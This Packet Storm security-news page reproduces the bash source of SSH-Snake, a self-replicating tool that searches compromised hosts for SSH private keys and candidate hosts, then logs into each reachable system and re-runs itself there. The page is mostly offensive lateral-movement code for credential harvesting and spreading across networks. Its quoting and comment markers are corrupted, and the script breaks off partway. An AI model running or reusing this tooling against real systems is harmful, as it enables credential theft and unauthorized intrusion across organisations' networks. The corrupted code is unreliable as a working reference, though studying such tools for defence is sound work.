Security
Headlines
HeadlinesLatestCVEs

Headline

SSH-Snake: Automated SSH-Based Network Traversal

SSH-Snake is a powerful tool designed to perform automatic network traversal using SSH private keys discovered on systems, with the objective of creating a comprehensive map of a network and its dependencies, identifying to what extent a network can be compromised using SSH and SSH private keys starting from a particular system. SSH-Snake can automatically reveal the relationship between systems which are connected via SSH, which would normally take a tremendous amount of time and effort to perform manually.suffers from bypass and traversal vulnerabilities.

Packet Storm
#vulnerability#ubuntu#debian#git#perl#aws#auth#ssh

SSH-Snake: Automated SSH-Based Network Traversal

Copyright © 2024 Joshua Rogers https://joshua.hu/, https://github.com/MegaManSec/SSH-Snake

GPL 3 License. See LICENSE and COPYING for more.

export THIS_SCRIPT=$(cat <<"MAIN_SCRIPT" # DO NOT EDIT THIS LINE

SETTINGS

General Settings

ignore_user=0 # [0|1]: Consider a dest already scanned based only on the ip address. If user1@host is accessed, further access to user2@host will not re-run scans. This may be useful in an environment where sudo is accessible by every user (because user1@host can already access the keys that user2@host can access).

use_sudo=1 # [1|0]: Attempt to use sudo on the dest. This may generate a large amount of security-related logs and can be extremely noisy.

ssh_timeout=3 # [3|n]: The connection timeout for ssh. See ssh_config(5)'s ConnectTimeout.

retry_count=3 # [3|n]: In some cases, a recoverable error in ssh may be encountered (such as trying to access an an AWS instance with a disabled username). This number corresponds to the maximum amount of times the destination is tried again. It’s generally advised to set this to at least 1.

ignored_users=() # (“ubuntu” “root”): A list of usernames that are always ignored. If we do somehow end up on a server with this username, we will print where we are but not scan the destination.

ignored_hosts=() # (“8.8.8.8” “example.com”): A list of hosts that are always ignored. If we do somehow end up on a server with this host, we will print where we are but not scan the destination. Best if it’s an ip address.

ignored_dests=() # (“[email protected]” “[email protected]”): A list of destinations that are always ignored. If we do somehow end up on a server with this destination address, we will print where we are but not scan the destination.

ignored_key_files=("badcert.pem" "badkey.pem") # ("badkey" "testkey" “/etc/ssh/" "/root//keys”): A list of locations that are ignored when searching for ssh keys. This setting supports globbing/wildcards using the standard asterisk as in any other bash script. Note that for example, “/dir/*/file” will also match "/dir/dir2/dir3/file".

custom_cmds=() # (): A list of commands that should be run after the script has been initialized and recursion has been checked. This means the commands will only be run ONCE when a destination is discovered for the first time. This list also supports sudo (if available), and can be used by using ${s} as a literal. For example, custom_cmds=(‘${s} ls /root’)

Private Key Discovery Settings

scan_paths=() # (“/home//" “/root/”): A list containing files or directories which should be searched for SSH private keys. Note that discovery of private keys is an intensive procedure, and scanning paths with many possible private key files can be slow. This setting supports globbing/wildcards using the standard asterisk as in any other bash script. For example, scan_paths=("/etc//keys” “/tmp/”).

scan_paths_depth=3 # [3|n]: If using scan_paths, specify the max-depth. Set to 99999 or some high number to have no restriction.

Username and Host Discovery Settings

use_find_from_hosts=1 # [1|0]: Attempt to find hosts using getent ahostsv4 (also know as /etc/hosts).

use_find_arp_neighbours=1 # [1|0]: arp neighbours may be interesting hosts.

use_find_d_block=0 # [0|1]: If we are connected to, for example, 10.1.2.3, it may be interesting to attempt to connect to 10.1.2.0-10.1.2.3.255, therefore we add these to a list of potential hosts.

Destination (user@host) Discovery Settings

use_find_from_authorized_keys=1 # [1|0]: authorized_keys files may contain a directive to only allow SSH from certain hosts. These are interesting, so try them.

use_find_from_last=1 # [1|0]: Check the last logins to this destination and attempt to ssh back to any addresses that have connected here before

use_find_from_prev_dest=1 # [1|0]: When a destination has been ssh’d into, attempt to SSH (with any keys found) back to the destination that we connected from.

use_find_from_known_hosts=1 # [1|0]: known_hosts files may contain hosts which have previously been SSH’d into.

use_find_from_hashed_known_hosts=0 # [0|1]: known_hosts files may contain hosts which have previously been SSH’d into. However, ssh’s HashKnownHosts option hashes the host files. We can try to brute force, which we do by brute-forcing the c and d blocks of the current destination’s ip add>

It may be interesting to attempt to ssh into all of the destinations that have previously been ssh’d into by previously scanned destinations.

Although we can’t find a direct link using one of the strategies on the destination from destinations A->C doesn’t mean the key won’t be accepted (where B->C has already been found).

Therefore, there are a few strategies for discovering these links.

There are four possible values for this setting:

0: Nothing.

1: Attempt to ssh into any destinations that up until the beginning of this script running, have been successfully connected to (by PREVIOUS destinations). For example: A->B->C. C will attempt to connect to B and A, B will attempt to connect to A.

2: In addition to #1, also attempt to ssh into any destinations that are indirectly connected to this destination in the the future. For example: A->B->C. As above, but A will also attempt to connect to C.

use_find_from_ignore_list=0 # [0|2]

use_find_from_ignore_list is slightly flawed. Consider the following:

A->B->C ; Normal scan

A->D->C ; A->D discovered naturally, D->C discovered using use_find_from_ignore_list=1 or use_find_from_ignore_list=2.

A->C ; A->C discovered using use_find_from_ignore_list=2.

In this case, the link from C->D will not be discovered because destination D was first discovered after destination C has already been scanned.

Since C has already been scanned, it won’t be scanned again, thus losing the valuable data of C->D.

Therefore, we have a completely different strategy.

Once the scan is completely finished (i.e. the inital script that a human runs), the whole scan completely re-runs with each of the previously discovered destinations added to interesting_dests().

Effectively, this means that every destination will be scanned by every other destination. at least once.

On the re-run, we do NOT attempt to discover any NEW users/hosts/dests, only discover keys. This means that although new chains may be discovered, no new destinations will be discovered.

Note: it is also possible that new destinations will be discovered with this method, due to some strange network routing, however this is not intentional. (see XXX: Should we report that this is a NEW destination?)

use_retry_all_dests=1 # [0|1]

Destination AND Private Key Discovery Settings

use_find_from_bash_history=1 # [1|0]: bash_history files may contain calls to ssh, scp or rsync, which may contain clues for users, hosts, dests, and private key locations. This is one of the best discovery techniques to leave enabled.

use_find_from_ssh_config=1 # [1|0]: ssh_config files may contain usernames, hosts, and private key locations.

Combinatorial Destination Discovery Settings

interesting_users=(“$USER” “root”) # (“$USER” “root”): A list of usernames which are always tried for every host that has been found if use_combinate_interesting_users_hosts=1.
interesting_hosts=(“127.0.0.1”) # (“127.0.0.1”): A list of hosts which which are always tried for every user that has been found if use_combinate_interesting_users_hosts=1.
interesting_dests=() # (“[email protected]”): A list of destinations which are always tried if use_combinate_interesting_users_hosts=1.

use_combinate_interesting_users_hosts=1 # [1|0]: Combine all interesting users with all hosts to create destinations. Combine all interesting hosts with all users to create destination. Combine all interesting users with all interesting hosts to create destinations.

use_combinate_users_hosts_aggressive=0 # [0|1]: Combine all found usernames with all found hosts into attempted destinations. This may result in massive growth of attempted destinations (100 usernames discovered with 100 hostnames will result in 10,000 attempted destinations).

#########
#########
######### Do not edit anything beyond this point unless you know what you’re doing!
#########
#########

export LC_ALL="C"
export PATH="$PATH:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/bin"

declare -A priv_keys
declare -A key_files
declare -A home_folders
declare -A ssh_files
declare -A priv_keys_files
declare -A root_ssh_keys # Used only to keep track of the number of keys discovered.
declare -A root_ssh_hostnames_dests # Used only to keep track of the number of servers accessed. Format is the same as hostnames_chain: user@(host1:host2).
declare -A root_ssh_hosts_dests # Also used to keep track of the number of servers accessed. Format is the same as hosts_chain: user@host.
declare -A ssh_users
declare -A ssh_hosts
declare -A ssh_dests
declare -A _ignored_users
declare -A _ignored_hosts
declare -A _ignored_dests
declare -A _ignored_key_files
declare -A files
declare -A not_files
declare -A folders
declare -A not_folders
declare -A current_ips
declare -A ignore_list_array

_ignored_hosts[“openssh.com”]=1

GLOBALS

ignore_separator="|"
ssh_options=(-oIdentitiesOnly=yes -oServerAliveInterval=300 -oTCPKeepAlive=no -oConnectTimeout="$ssh_timeout" -oStrictHostKeyChecking=no -oGlobalKnownHostsFile=/dev/null -oUserKnownHostsFile=/dev/null -oBatchMode=yes)
ssh_extra_options=(-oHostkeyAlgorithms=+ssh-rsa -oKexAlgorithms=+diffie-hellman-group1-sha1)
user="$USER"
script="$1"
hosts_chain="$(printf “%s” “$2” | base64 -d)" # This contains the exact chain we used to connect between servers.
hostnames_chain="$(printf “%s” “$5” | base64 -d)" # This contains the chain that includes all possible ip addresses of a server.
ignore_list="$3"
this_dest="$4"
this_host="${this_dest#*@}"
current_hostnames_ip=""
#current_hosts_ip=""
sshkeygen=(“ssh-keygen” "-E" “md5” "-l" "-f")
indent=""
s=""

allowed_host_chars=’[a-zA-Z0-9_.-]'
allowed_users_chars=’[a-z_][a-z0-9_-]{0,31}’

Print the title screen.

print_snake() {
cat << “EOF”
__ __ __ __
/ \ / \ / \ / \
____________________/ / / / _______________________________,
___________________/ /
/ /
/ /
/ /__________________________________|
| / \ / \ / \ / \ _
_ |
|/ _/ _/ _/ \ o \ |
_____/–< |
—_ …-–. |
(|\ / / /| \ \ ? |
/ / .’ -=-' . . | / / .' ) ' | _/ / .' _.) / _ -- ~~~ -- _ _______ | / o o _.-' / .' .-~ ~-.{__-----. : | \ _.-' / .'*| / \ | | | \______.-'// .'.' \*| : O O : | | | \| \ | // .'.' _ |*| /\ /------' j | |// .’.’_ _ |*| { {/~-. .-~~~~~~~~~~ |
. .// .’.’ | _ _ *| / / |~:- .
. -.~\ \ \ |
`-|_/ / \ _ _ *\ / /\ \ | | { { \ \ } } \ \ |
/'\__/ \ _ _ \*\ { { \ \ | \ \ \ \ / } } | /^| \ _ _ \* \ \ /\ \ \ \ /\ \ { { | ' \ _ _ \ } } { { \ \ \ / / \ \ \ \ |
_ / / } } \ \ }{ { \ \ } } |
___________________________ / / { { \ {\ \ } { { |
( Written for the mediocre. ) / / } } } }\ \ / / \ \ |
( By the mediocre. ) -' { {-'\ `-'/ / -' | -----------------------------' -'-' |
^
^ o |
_______)xx( o https://github.com/MegaManSec/SSH-Snake |
/) )( By Joshua Rogers https://joshua.hu/ |
| w----|| U |
|| || GPL 3, of course. |
________________________~_____/^,
_,-^_________________~~_______________/`

EOF
}

Print a summary of the settings we’re using.

print_settings() {
local setting_keys
local setting_values
local max_key_length
local max_value_length
local i

setting_keys=(“ignore_user” “use_sudo” “ssh_timeout” “retry_count” “scan_paths” “scan_paths_depth” “interesting_users” “interesting_hosts” “interesting_dests” “ignored_users” “ignored_hosts” “ignored_dests” “ignored_key_files” “custom_cmds” “use_combinate_interesting_users_hosts” “use_combinate_users_hosts_aggressive” “use_find_from_hosts” “use_find_from_last” “use_find_from_authorized_keys” “use_find_from_known_hosts” “use_find_from_ssh_config” “use_find_from_bash_history” “use_find_arp_neighbours” “use_find_d_block” “use_find_from_hashed_known_hosts” “use_find_from_prev_dest” “use_find_from_ignore_list” “use_retry_all_dests”)
setting_values=(“$ignore_user” “$use_sudo” “$ssh_timeout” “$retry_count” “${scan_paths[]}" “$scan_paths_depth” "${interesting_users[]}” “${interesting_hosts[]}" "${interesting_dests[]}” “${ignored_users[]}" "${ignored_hosts[]}” “${ignored_dests[]}" "${ignored_key_files[]}” “${custom_cmds[*]}” “$use_combinate_interesting_users_hosts” “$use_combinate_users_hosts_aggressive” “$use_find_from_hosts” “$use_find_from_last” “$use_find_from_authorized_keys” “$use_find_from_known_hosts” “$use_find_from_ssh_config” “$use_find_from_bash_history” “$use_find_arp_neighbours” “$use_find_d_block” “$use_find_from_hashed_known_hosts” “$use_find_from_prev_dest” “$use_find_from_ignore_list” “$use_retry_all_dests”)

max_key_length=0
max_value_length=0

for ((i=0; i<${#setting_keys[@]}; i++)); do
key_length="${#setting_keys[$i]}"
value_length="${#setting_values[$i]}"

((key_length > max_key_length)) && max_key_length=$key_length  
((value_length > max_value_length)) && max_value_length=$value_length  

done

printf “|%-s|%-s|\n” "$((max_key_length + 2))" "$(printf – '-%.0s’ $(seq "$((max_key_length + 4))"))" "$((max_value_length + 2))" "$(printf – '-%.0s’ $(seq "$((max_value_length + 4))"))"
printf “| %-s | %-s |\n” "$((max_key_length + 2))" “Setting” "$((max_value_length + 2))" “Value”
printf “|%-s|%-s|\n” "$((max_key_length + 2))" "$(printf – '-%.0s’ $(seq "$((max_key_length + 4))"))" "$((max_value_length + 2))" "$(printf – '-%.0s’ $(seq "$((max_value_length + 4))"))"

for ((i=0; i<${#setting_keys[@]}; i++)); do
printf “| %-s | %-s |\n” "$((max_key_length + 2))" “${setting_keys[$i]}” "$((max_value_length + 2))" “${setting_values[$i]}”
done

printf “|%-s|%-s|\n\n\n” "$((max_key_length + 2))" "$(printf – '-%.0s’ $(seq "$((max_key_length + 4))"))" "$((max_value_length + 2))" "$(printf – '-%.0s’ $(seq "$((max_value_length + 4))"))"
}

Function to remove specific bash functions and their calls from the script passed via $1.

remove_functions() {
local this_script
local function_names

this_script="$1"
function_names="$2"

Use awk to filter out the functions and their calls from the script

printf “%s” “$this_script” | awk -v fnames="$function_names" '
# ^func_name()
function is_func_line() {
for (i in funcs) {
if ($0 ~ “^” funcs[i] "\(\)") {
return 1
}
}
return 0
}

# [space][space][...] func_name  
function is_func_call() {  
  for (i in funcs) {  
    if ($0 ~ "^[[:space:]]*" funcs[i]) {  
      return 1  
    }  
  }  
  return 0  
}

BEGIN {  
  split(fnames, funcs, " ");  
  in_func = 0  
}

is_func_line() { in_func = 1; next }  
# end of the function is ^}  
/^\}/ { if (in_func) { in_func = 0; next } }  
is_func_call() { next }  
!in_func { print }  

'
}

Function to convert all final ssh destinations from root_ssh_hostnames_dests from the format user@(host1:host2:…) (aka hostnames_chain format) into user@host user@host2 …

Prints all user@host combinations, including those from root_ssh_hosts_dests (aka hosts_chain format)

This is only used if use_retry_all_dests is set to 1.

gen_retried_interesting_dests() {
local ssh_dest

ssh_dest format is user@(host1:host2)

Output of this is \x22user@host1\x22\n\x22user@host2\x22

for ssh_dest in "${!root_ssh_hostnames_dests[@]}"; do
printf “%s” “$ssh_dest” | awk -F’[@():]' -v OFS=’@’ '
{
user = $1
for (i = 2; i <= NF; i++) {
if ($i != “” && user != “”) {
print “\x22” user “@” $i “\x22”
}
}
}’
done

for ssh_dest in "${!root_ssh_hosts_dests[@]}"; do
printf “\\x22%s\\x22\n” “$ssh_dest”
done
}

If the script is run for the first time (or: the script has not been executed with the script’s contents as the first argument) it executes itself.

It also removes any comments, unnecessary white-spaces, and unused functions from the script (including this one!), to save space for arguments.

shape_script() {
local line
local local_script
local opt_function_list
local opt_function
local ssh_dest

if ! command -v sed >/dev/null 2>&1; then
printf “Could not begin because ‘sed’ is not available!\n”
exit 1
fi

opt_function_list=(“use_combinate_interesting_users_hosts” “use_combinate_users_hosts_aggressive” “use_find_from_hosts” “use_find_from_last” “use_find_from_authorized_keys” “use_find_from_known_hosts” “use_find_from_ssh_config” “use_find_from_bash_history” “use_find_arp_neighbours” “use_find_d_block” “use_find_from_hashed_known_hosts” “use_find_from_prev_dest” “use_find_from_ignore_list” “use_retry_all_dests”)

for opt_function in "${opt_function_list[@]}"; do
if [[ ${!opt_function} -eq 0 ]]; then
remove_function+="${opt_function#use_} "
fi
# Two-off because use_find_from_ignore_list is variable from 0-2, and we use use_retry_all_dests to know we’re inside a loop.
[[ “$opt_function” =~ use_find_from_ignore_list|use_retry_all_dests ]] && continue
remove_function+="$opt_function "
done

if [[ ${#custom_cmds[@]} -eq 0 ]]; then
remove_function+="exec_custom_cmds "
remove_function+="custom_cmds "
fi
if [[ ${#scan_paths[@]} -eq 0 || $scan_paths_depth -lt 1 ]]; then
remove_function+="find_ssh_keys_paths "
remove_function+="scan_paths "
remove_function+="scan_paths_depth "
fi
if [[ ${#ignored_users[@]} -eq 0 && ${#ignored_hosts[@]} -eq 0 && ${#ignored_dests[@]} -eq 0 ]]; then
remove_function+="init_ignored "
remove_function+="ignored_users ignored_hosts ignored_dests "
fi
if [[ $use_combinate_users_hosts_aggressive -eq 0 ]] && [[ ${#interesting_users[@]} -eq 0 || $use_combinate_interesting_users_hosts -eq 0 ]]; then
remove_function+="find_from_hosts find_arp_neighbours find_d_block " # These functions only find hosts, and since we have no interesting_users, we’re never going to combinate them using combinate_interesting_users_hosts. XXX: Should we warn the user?
fi
if [[ $use_find_from_authorized_keys -eq 0 && $use_find_from_known_hosts -eq 0 && $use_find_from_hashed_known_hosts -eq 0 ]]; then # find_user_from_file is only used in these three functions.
remove_function+="find_user_from_file "
fi
if [[ $use_combinate_users_hosts_aggressive -eq 1 ]]; then
remove_function+="use_combinate_interesting_users_hosts combinate_interesting_users_hosts " # use_combinate_users_hosts_aggressive is a superset of combinate_interesting_users_hosts.
fi
if [[ $use_combinate_interesting_users_hosts -eq 0 && $use_combinate_users_hosts_aggressive -eq 0 ]]; then
remove_function+="interesting_hosts interesting_users "
if [[ $use_retry_all_dests -eq 0 ]]; then
remove_function+="interesting_dests "
fi
fi
if [[ ${#interesting_users[@]} -eq 0 && ${#interesting_hosts[@]} -eq 0 && ${#interesting_dests[@]} -eq 0 ]]; then
if [[ $use_retry_all_dests -eq 0 ]]; then
remove_function+="interesting_dests "
fi
remove_function+="combinate_interesting_users_hosts use_combinate_interesting_users_hosts "
remove_function+="interesting_users interesting_hosts "
fi
if [[ $use_find_from_ignore_list -eq 0 ]]; then
remove_function+="use_find_from_ignore_list "
fi
if [[ $use_retry_all_dests -eq 0 ]]; then
remove_function+="use_retry_all_dests "
fi
if [[ $use_sudo -eq 0 ]]; then
remove_function+="check_sudo use_sudo s= "
fi
if [[ ${#ignored_key_files[@]} -eq 0 ]]; then
remove_function+="ignored_key_files "
fi

Remove this function

remove_function+="shape_script "

Remove the fin_root function

remove_function+="fin_root "

Remove the print_settings function

remove_function+="print_settings "

Remove the remove_functions function

remove_function+="remove_functions "

Remove the print_snake function

remove_function+="print_snake "

Remove the gen_retried_interesting_dests function

remove_function+="gen_retried_interesting_dests "

Remove the root_ssh_keys, root_ssh_hostnames_dests, and root_ssh_hosts_dests variables

remove_function+="root_ssh_keys root_ssh_hostnames_dests root_ssh_hosts_dests"

TODO: We should remove declare -A root_ssh_keys, declare -A root_ssh_hostnames_dests, and declare -A root_ssh_hosts_dests somehow.

Actually remove it all.

local_script="$(remove_functions “$THIS_SCRIPT” “$remove_function”)"

Remove all comments and unnecessary white-spaces.

local_script="$(printf “%s” “$local_script” | sed -e ‘s/^[ \t]//’ -e 's/^#.$//’ -e ‘s/[[:space:]]#.//’ -e '/^[[:space:]]$/d’)"

XXX: If we want to see what script we’re running, then this is the place to print "$local_script". Or above the previous line.

printf “%s” “$local_script”

while IFS= read -r line; do
if [[ “$line” == “EXTERNAL_MSG: KEY” ]]; then
root_ssh_keys[“${line##* }”]=1
elif [[ “$line” =~ ($allowed_users_chars@([0-9.:]))$ ]]; then # Capture user@(host1:host2)
root_ssh_hostnames_dests[“${BASH_REMATCH[1]}”]=1
elif [[ “$line” =~ ($allowed_users_chars@[0-9.]
)$ ]]; then # capture user@host
root_ssh_hosts_dests[“${BASH_REMATCH[1]}”]=1
fi
printf "[%s]" "$(date +%s)"
printf “%s\n” “$line”
done < <(echo ‘printf “%s” “$1” | base64 -d | stdbuf -o0 bash --noprofile --norc -s $1’ | stdbuf -o0 bash --noprofile --norc -s "$(printf “%s” “$local_script” | base64 | tr -d ‘\n’)" 2>&1 | grep -v -F ‘INTERNAL_MSG’)

[[ $use_retry_all_dests -eq 1 ]] || return

printf “\n\n---------------------------------------\n\n”
printf “use_retry_all_dests=1. Re-starting.\n”

local retried_interesting_dests
retried_interesting_dests="$(gen_retried_interesting_dests | sort -u)"

printf “%s destinations (from %s unique servers) added to interesting_dests.\n” "$(echo “$retried_interesting_dests” | wc -l)" “${#root_ssh_hostnames_dests[@]}”
retried_interesting_dests="$(echo “$retried_interesting_dests” | tr ‘\n’ ' ')"

printf “\n---------------------------------------\n\n\n”

local_script="$(printf “%s” “$local_script” | sed '/^interesting_dests=(/c\interesting_dests=(‘"$retried_interesting_dests"’)')"
local_script="$(printf “%s” “$local_script” | sed ‘s/^use_retry_all_dests=1/use_retry_all_dests=2/’)"

We do not want to find any new dests and so on, so remove all of the non-key functions.

If you REALLY want to look for new users/hosts/dests using use_combinate_users_hosts_aggressive or combinate_interesting_users_hosts(interesting_users/interesting_hosts), then replace the following line with remove_function="retry_all_dests".

remove_function="find_from_authorized_keys find_from_hosts find_from_last find_arp_neighbours find_d_block find_from_ignore_list find_from_known_hosts find_from_hashed_known_hosts find_from_prev_dest combinate_users_hosts_aggressive combinate_interesting_users_hosts interesting_users interesting_hosts deduplicate_resolved_hosts_keys init_ignored ignored_users ignored_hosts ignored_dests find_user_from_file "
local_script="$(remove_functions “$local_script” “$remove_function”)"

while IFS= read -r line; do
if [[ “$line” == “EXTERNAL_MSG: KEY” ]]; then
root_ssh_keys[“${line##* }”]=1
elif [[ “$line” =~ ($allowed_users_chars@([0-9.:]))$ ]]; then # Capture user@(host1:host2)
root_ssh_hostnames_dests[“${BASH_REMATCH[1]}”]=1
elif [[ “$line” =~ ($allowed_users_chars@[0-9.]
)$ ]]; then # capture user@host
root_ssh_hosts_dests[“${BASH_REMATCH[1]}”]=1
fi
printf "[%s]" "$(date +%s)"
printf “%s\n” “$line”
done < <(echo ‘printf “%s” “$1” | base64 -d | stdbuf -o0 bash --noprofile --norc -s $1’ | stdbuf -o0 bash --noprofile --norc -s "$(printf “%s” “$local_script” | base64 | tr -d ‘\n’)" 2>&1 | grep -v -F ‘INTERNAL_MSG’)
}

If this is the first IP in the chain, prepare some data from the chain, which will be printed by the root script.

fin_root() {
local root_ssh_dest
declare -A root_ssh_hosts

for root_ssh_dest in "${!root_ssh_hostnames_dests[@]}"; do
root_ssh_hosts[“${root_ssh_dest#*@}”]=1
done

printf “\n\n\n”

cat <<"EOF"
______
.-“” “”-.
.-' -. .' __.----.__.
/ .-" "-. \
/ .’ . \ J / \ L F J L J J F J L | J L | | | | | | J F | J L J F L J .-""""-. F J J \ / \ __ / F \ (|)(|)_ .-'".' .' / \ \ /_>-' .<_.-' /. -' .' .'–.|__.-'`. _.-'
^ “""”

       ..             ..  
      ( '`<          ( '`<  ...Summary Report:  
       )(             )(  
( ----'  '.    ( ----'  '.  
(         ;    (         ;  
 (_______,'     (_______,'  

~^~^~^~^~^~^~^~^~^~^^~^~^~^~^~^~^~^~^~^^~^~^~^~^

EOF

printf “Unique private keys discovered: %s\n” “${#root_ssh_keys[@]}”
printf “Unique shell accounts accessed: %s\n” “${#root_ssh_hostnames_dests[@]}”
printf “Unique systems accessed: %s\n” “${#root_ssh_hosts[@]}”
printf “\nNeed a list of servers accessed? Run one of these commands:\n\n”
cat <<"EOF"
grep -oE "[a-z_][a-z0-9_-]{0,31}@[0-9.]$" output.log | sort -u
grep -oE "[a-z_][a-z0-9_-]{0,31}@([0-9.:]
)$" output.log | sort -u

EOF

printf – "-- https://joshua.hu/ --\n"
printf – "-- https://github.com/MegaManSec/SSH-Snake --\n"
printf “\nThanks for playing!\n”
}

Ensures that the server is running bash and has all of the required inbuilts and programs required for the script to run.

If a version of bash is not compatible with the script, it reports the version but does not continue.

If any of the required programs/inbuilts are missing, it also reports the violation and quits.

check_startup() {
local required_commands
local required_command

required_commands=(“ssh-keygen” “readlink” “getconf” “ssh” “basename” “base64” “getent” “awk” “sort” “grep” “tr” “find” “cat” “stdbuf”) # “sudo” “hostname” “xargs” are all optional.

if [[ “${BASH_VERSINFO:-0}” -lt 4 ]]; then
printf “INTERNAL_MSG: command not found: BASH%d: %s\n” “${BASH_VERSINFO[0]}” “${BASH_VERSINFO[*]}”
exit 1
fi

for required_command in "${required_commands[@]}"; do
if ! command -v “$required_command” >/dev/null 2>&1; then
printf “INTERNAL_MSG: command not found: %s\n” “$required_command”
exit 1
fi
done

This is the beginning of the main script: print_snake, print_settings, then shape_script (which executes the script via stdin)

if [[ -z “$script” ]]; then
print_snake
print_settings
shape_script
fin_root
exit 0
fi

if ! printf “%s” “$script” | base64 -d >/dev/null 2>&1; then
printf “Usage: stdbuf -o0 bash %s >output.log\n” “$0”
exit 1
fi
}

Prints the current $ignore_separator$user@$current_hostnames_ip$ignore_separator and exits.

Also print the ignore list for $current_hosts_ip if $current_hosts_ip is set (aka $user@$current_hosts_ip is not in $current_hostnames_ip)

This should only be called on a successful scan.

fin() {
printf “INTERNAL_MSG: ignore list: %s%s@%s%s\n” “$ignore_separator” “$user” “$current_hostnames_ip” “$ignore_separator”

[[ -n “$current_hosts_ip” ]] && printf “INTERNAL_MSG: ignore list: %s%s@%s%s\n” “$ignore_separator” “$user” “$current_hosts_ip” “$ignore_separator” # XXX: Is this smart to do? Probably not: disabled until further notice.

exit 0
}

If use_sudo is set, we check whether we are able to use sudo.

If we can use sudo, set $s with the sudo command.

check_sudo() {
[[ $use_sudo -eq 1 ]] && command -v sudo >/dev/null 2>&1 && sudo -n true >/dev/null 2>&1 && s="sudo"
}

Different versions of ssh-keygen support different options.

Older versions of ssh-keygen do not support the -E argument to specify the hashing method of a public key, instead only allowing MD5.

Therefore, check whether we can use -E, and if not, set $sshkeygen to ssh-keygen -lf.

check_sshkeygen() {
[[ “$(ssh-keygen -E 2>&1)" == “unknown option” ]] && sshkeygen=(“ssh-keygen” "-l” "-f")
}

Older versions of ssh-keygen do not support the appending of HostkeyAlgorithms and KexAlgorithms values.

Don’t use them unless they’re supported.

check_ssh_options() {
[[ $(ssh -oHostkeyAlgorithms=+ssh-rsa 2>&1) =~ Bad\ protocol\ 2\ host\ key\ algorithms|Bad\ SSH2\ KexAlgorithms ]] || ssh_options+=(“${ssh_extra_options[@]}”)
}

Determining the ip address of the current destination is difficult because it may have multiple ip addresses, and we are likely to connect to both of them eventually (including 127.0.0.1 for example).

This means that we effectively have multiple hosts despite it being the same destination, meaning pathways may be left mangled (A->B->C exists, and A->C exists too but with a different ip address).

Therefore, we take two strategies for finding and printing the addresses of the destination.

Firstly, define the current destination’s address as the concatenation of all of its ipv4 addresses: IP_1:IP_2:IP_3. The output of that will be:

user@(IP_1:IP_2:IP_3)[keyfile]->user@(IP_1:IP_2:IP_3)[keyfile]->user@(IP_1:IP_2:IP_3)…

This output isn’t particuarly useful for using to actually connect to hosts using the data, but it is useful for creating graphs (because each destination will correspond to a collection of ip addresses).

This format of ip address is also useful for the script to determine whether a destination has already been scanned or not (aka whether the destination are in the ignore_list).

Therefore, we split all ips for this host and add a separator ":", which we use for the ignore_list as well.

Secondly, we determine the destination’s address which the script actually used to connect to this server:

user@host[keyfile]->user@host[keyfile]->user@host

This output is useful to see what the script actually did, and can therefore be used to recreate the ssh command needed to get from server A to server B.

init_current_ips() {
local current_ip
local default_route
local default_ip

Create the current_ips array containing all of the ipv4 addresses of the destination.

if command -v hostname >/dev/null 2>&1; then
while IFS= read -r current_ip; do
current_ips[“$current_ip”]=1
done < <(${s} hostname -I 2>/dev/null | tr ' ' ‘\n’ | grep -F ‘.’)
current_hostnames_ip="$(IFS=:; echo “${!current_ips[*]}”)"
fi

Then, determine the ip address for connecting to the default gateway. Otherwise, to the internet.

sudo is required on some systems, so use it if possible.

if command -v ip >/dev/null 2>&1; then
default_route="$(${s} ip route show default | awk ‘/default via/{print $3; exit}’)"
default_route="${default_route:-“1.1.1.1"}”
default_ip="$(${s} ip route get “$default_route” | awk -F’src’ ‘{print $NF; exit}’ | awk ‘{print $1}’)"
fi
default_ip="${default_ip:-“???"}”

If $this_host has not been passed to us, set our address to the default ip address.

this_host="${this_host:-“$default_ip"}”

If hostname -I does not work, then just fill the array with $this_host.

[[ ${#current_ips[@]} -eq 0 ]] && current_ips[“$this_host”]=1 && current_hostnames_ip="$this_host"
}

Initialize this server/destination’s chains.

Using both chains provided to the script by the $2 and $5 arguments, we combine them with the current username and ip addresses, separated by ->.

init_chains() {

Initalize the hosts_chain. This chain is the real pathway we used to access this server/destination.

For example, user@host[key]->user@host.

hosts_chain="$hosts_chain${hosts_chain:±>}$user@$this_host"

Initalize the hostnames_chain. This chain is not the exact pathway in the network sense, but rather the pathway of unique servers (independent of the ip address we used to access them).

For example, user@(host)[key]->user@(host:host:host:host)

hostnames_chain="$hostnames_chain${hostnames_chain:±>}$user@($current_hostnames_ip)"
}

Determine the length of the indentation based on the current chain’s length

Which chain does not matter, but we use hosts_chain.

For each "]->", we want to indent 1 characters.

To determine the amount of ]-> instances, we loop through the chain and continuously cut where it’s found.

init_indent() {
local recursive_indent_length
local temp_chain
local pattern

pattern=’]->’
temp_chain="$hosts_chain"
recursive_indent_length=0

while [[ “$temp_chain” == “$pattern” ]]; do # XXX: Should we just use grep -c?
((recursive_indent_length++))
temp_chain="${temp_chain#*"$pattern"}" # Cut the temp. chain at the first ]->
done

indent="$(printf “%*s” $recursive_indent_length “”)"
}

Print a line beginning with the appropriate indent and hosts_chain, and anything afterwards.

We use hosts_chain here because it makes more sense to describe the current address.

Argument $1 is what to print after the chain.

chained_print() {
printf “%s%s%s\n” “$indent” “$hosts_chain” “$1”
}

Parse the settings ignored_users, ignored_hosts and ignored_dests, and populate their corresponding internal arrays.

Quit if this user, host, or destination is ignored, too (how did we get here?)

init_ignored() {
local ignored_user
local ignored_host
local ignored_dest
local current_ip

for ignored_user in "${ignored_users[@]}"; do
is_ssh_user “$ignored_user” && _ignored_users[“$ignored_user”]=1
[[ “$ignored_user” == “$user” ]] && fin
done

for ignored_host in "${ignored_hosts[@]}"; do
is_ssh_host “$ignored_host” && _ignored_hosts[“$ignored_host”]=1
[[ -v 'current_ips[“$ignored_host”]' || ${#current_ips[“$ignored_host”]} -gt 0 ]] && fin
done

for ignored_dest in "${ignored_dests[@]}"; do
is_ssh_dest “$ignored_dest” && _ignored_dests[“$ignored_dest”]=1
for current_ip in "${!current_ips[@]}"; do # TODO: Can use current_ips[*] as a one-liner. Also should we be alerting that we got to an ignored dest somehow?
[[ “$ignored_dest” == “$user@$current_ip” ]] && fin
done
done
}

Load all of the destinations from the ignore_list into the ignore_list_array array.

load_ignore_list_array() {
local line

while IFS= read -r line; do
ignore_list_array[“$line”]=1
done < <(echo “$ignore_list” | tr ‘|’ ‘\n’ | awk -F’[@:]' -v OFS=’@’ '
{
user = $1
for (i = 2; i <= NF; i++) {
if ($i != “” && user != “”) {
print user “@” $i
}
}
}’
)
}

Determine whether the current server has already been scanned.

If it has already been scanned (or is in the process of being scanned), finish.

